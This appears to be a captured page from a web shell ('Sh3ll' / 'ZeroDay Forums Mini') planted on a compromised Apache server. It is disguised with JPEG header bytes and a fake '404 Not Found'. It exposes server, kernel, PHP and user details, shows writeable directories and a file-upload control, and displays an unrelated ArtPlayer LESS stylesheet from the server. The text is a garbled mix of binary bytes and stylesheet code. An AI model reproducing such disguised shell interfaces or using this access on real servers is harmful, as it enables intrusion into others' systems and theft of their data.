����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/video/layout/js/node_modules/artplayer/src/style/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/video/layout/js/node_modules/artplayer/src/style/setting.less
.art-video-player {
    .art-settings {
        display: none;
        flex-direction: column;
        position: absolute;
        z-index: 90;
        left: auto;
        overflow-y: auto;
        overflow-x: hidden;
        border-radius: var(--art-border-radius);
        transform-origin: bottom right;
        max-height: var(--art-settings-max-height);
        right: var(--art-padding);
        bottom: var(--art-control-height);
        transform: scale(var(--art-settings-scale));
        transition: all var(--art-transition-duration) ease;
        background-color: var(--art-widget-background);

        .art-setting-panel {
            display: none;
            flex-direction: column;

            &.art-current {
                display: flex;
            }

            .art-setting-item {
                display: flex;
                justify-content: space-between;
                align-items: center;
                padding: 0 5px;
                cursor: pointer;
                overflow: hidden;
                transition: background-color var(--art-transition-duration) ease;

                &:hover {
                    background-color: rgba(255, 255, 255, 0.1);
                }

                &.art-current {
                    color: var(--art-theme);
                }

                .art-icon-check {
                    visibility: hidden;
                    height: 15px;
                }

                &.art-current .art-icon-check {
                    visibility: visible;
                }

                .art-setting-item-left {
                    .art-center();
                    gap: 5px;

                    .art-setting-item-left-icon {
                        .art-center();
                        height: var(--art-settings-icon-size);
                        width: var(--art-settings-icon-size);
                    }
                }

                .art-setting-item-right {
                    .art-center();
                    gap: 5px;
                    font-size: 12px;

                    .art-setting-item-right-tooltip {
                        white-space: nowrap;
                        color: rgba(255, 255, 255, 0.5);
                    }

                    .art-setting-item-right-icon {
                        .art-center();
                        min-width: 32px;
                        height: 24px;
                    }

                    .art-setting-range {
                        height: 3px;
                        width: 80px;
                        outline: none;
                        appearance: none;
                        background-color: rgba(255, 255, 255, 0.2);
                    }
                }
            }

            .art-setting-item-back {
                border-bottom: 1px solid rgba(255, 255, 255, 0.1);
            }
        }
    }

    &.art-setting-show {
        .art-settings {
            display: flex;
        }
    }
}

ZeroDay Forums Mini